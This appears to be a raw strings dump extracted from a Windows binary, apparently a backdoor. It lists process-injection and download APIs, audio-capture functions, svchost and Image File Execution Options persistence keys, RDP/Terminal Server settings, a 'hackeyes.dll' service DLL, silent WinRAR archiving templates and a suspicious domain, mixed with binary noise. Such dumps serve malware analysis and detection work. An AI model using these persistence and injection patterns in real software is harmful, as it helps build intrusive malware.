SHGetFileInfoA SHGetSpecialFolderPathA shlwapi.dll SHLWAPI.dll shsvcs.dll ShutdownWithoutLogon SizeofResource %s M -ibck -r -o+ -ep1 "%s" "%s\*" _snprintf SOFTWARE\Mi SOFTWARE\Microsoft\Windows\CurrentVersion\netcache SOFTWARE\Microsoft\Windows NT\CurrentVersion SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SOFTWARE\Policies\Microsoft\Windows\Installer \\%s\pipe \\%s\pipe\browser ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ sprintf =+=`=S>r>w> %s%s*.* =:=S=s= %s\%s%d.exe %s\%s.dll SSDPSRV ssdpsrv.dll %s\SHELL\OPEN\COMMAND %s\%s\%s %s%s\%s %s%s%s StartServiceA strchr _strcmpi stream end stream error strncat strncmp strncpy _strnicmp strrchr strstr \SUVWhP SVWhDdk h$ SVWQRj swsocknetman1ssdp %s X -ibck "%s" "%s\" System \system32 SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal SYSTEM\CurrentControlSet\Control\SafeBoot\Network SYSTEM\CurrentControlSet\Control\Terminal Server SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp system\cURRENTcONTROLsET\sERVICES\ SYSTEM\CurrentControlSet\Services system\cURRENTcONTROLsET\sERVICES\%s SYSTEM\CurrentControlSet\Services\TermDD SYSTEM\CurrentControlSet\Services\TermService SYSTEM\Current%s\%s SystemParametersInfoA %SystemRoot%\system32\hackeyes.dll %SystemRoot%\System32\svchost.exe -k netsvcs System Volume Information |$-[t. T$0QRP T+3x%A Tapisrv tapisrv.dll T$DPVS T$dQRP TerminateProcess TerminateThread .textVT T$ Fj:V T$(Fj:V Themes _This #g !This program cannot be run in DOS mode. 
Thread32First Thread32Next ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z tJ<\u8 |$<.tK T$LPQR T$LRWS too many length or distance symbols T$,PQhX@ T$(PQR T$ QRj tqSUVj2W TransactNamedPipe TranslateMessage T$ RQPV T$,RWV TSEnabled t-</t)F tTisrv t$ WSPVR ?%_#txg tZ9H tU9H$tP >"u:F@ UnhookWindowsHookEx unknown compression method UnmapViewOfFile upnphost upnphost.dll #upnphostKn&s URLDownloadToFileA urlmon.dll USER32.dll User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E) UuidFromStringA UuidToStringA \$ UVW :@;v;{; V3_3o3x3 V6sion\ VDPQRUSP v|htcL VirtualAlloc VirtualAllocEx VirtualFree VirtualProtect <;<V<i<u< V@j QR +*%*+vp*vCpuC VVVVh0 VVVVVV VVVVVVYUhbMC+Fnw== ?'?.?w? |w9=trW W(9W$u WaitForMultipleObjects WaitForSingleObject waveInAddBuffer waveInClose waveInGetNumDevs waveInOpen waveInPrepareHeader waveInReset waveInStart waveInStop waveInUnprepareHeader waveOutClose waveOutGetNumDevs waveOutOpen waveOutPrepareHeader waveOutReset waveOutUnprepareHeader waveOutWrite wcscpy wcstombs WideCharToMultiByte WindowFromPoint WINDOWS Windows Media Player Windows NT WindowsUpdate WinExec WININET.dll Winlogon WINMM.dll WinRAR winsta0 winsta0\default WinSta0\Default WINTRUST.dll WinVerifyTrust WithTag WmdmPmSN WmdmPmSN'Fa WNetAddConnection2A WNetCloseEnum WNetEnumResourceA WNetOpenEnumA WO$_9E WriteFile WriteProcessMemory Ws2_32.dll WS2_32.dll WSAAddressToStringA WSACreateEvent WSAIoctl WSARecvFrom WSAResetEvent WSASocketA wsprintfA WTSAPI32.dll WTSFreeMemory WTSQuerySessionInformationA |$ WUSV |$ WVU WWRhP[ www.490a-B8B5-9B8C1E870B0C.com www.baidu.com WWWWWW WWWWWWnw== < =x=}= _XcptFilter <)<.<X<i<o <)<.<X<i<o< xmlpbS xmlprov xmlprov.dll {+xN{tEODBE XPTPSW XPVSSG ?_Xran@std@@YAXXZ XRichS xwuLEwE /;%y;~; .y!GN& *y/.uzyzuEFzG @z}]u2o ZwClose ZwCreateKey ZwOpenKey ZwQueryInformationThread ZwSetValueKey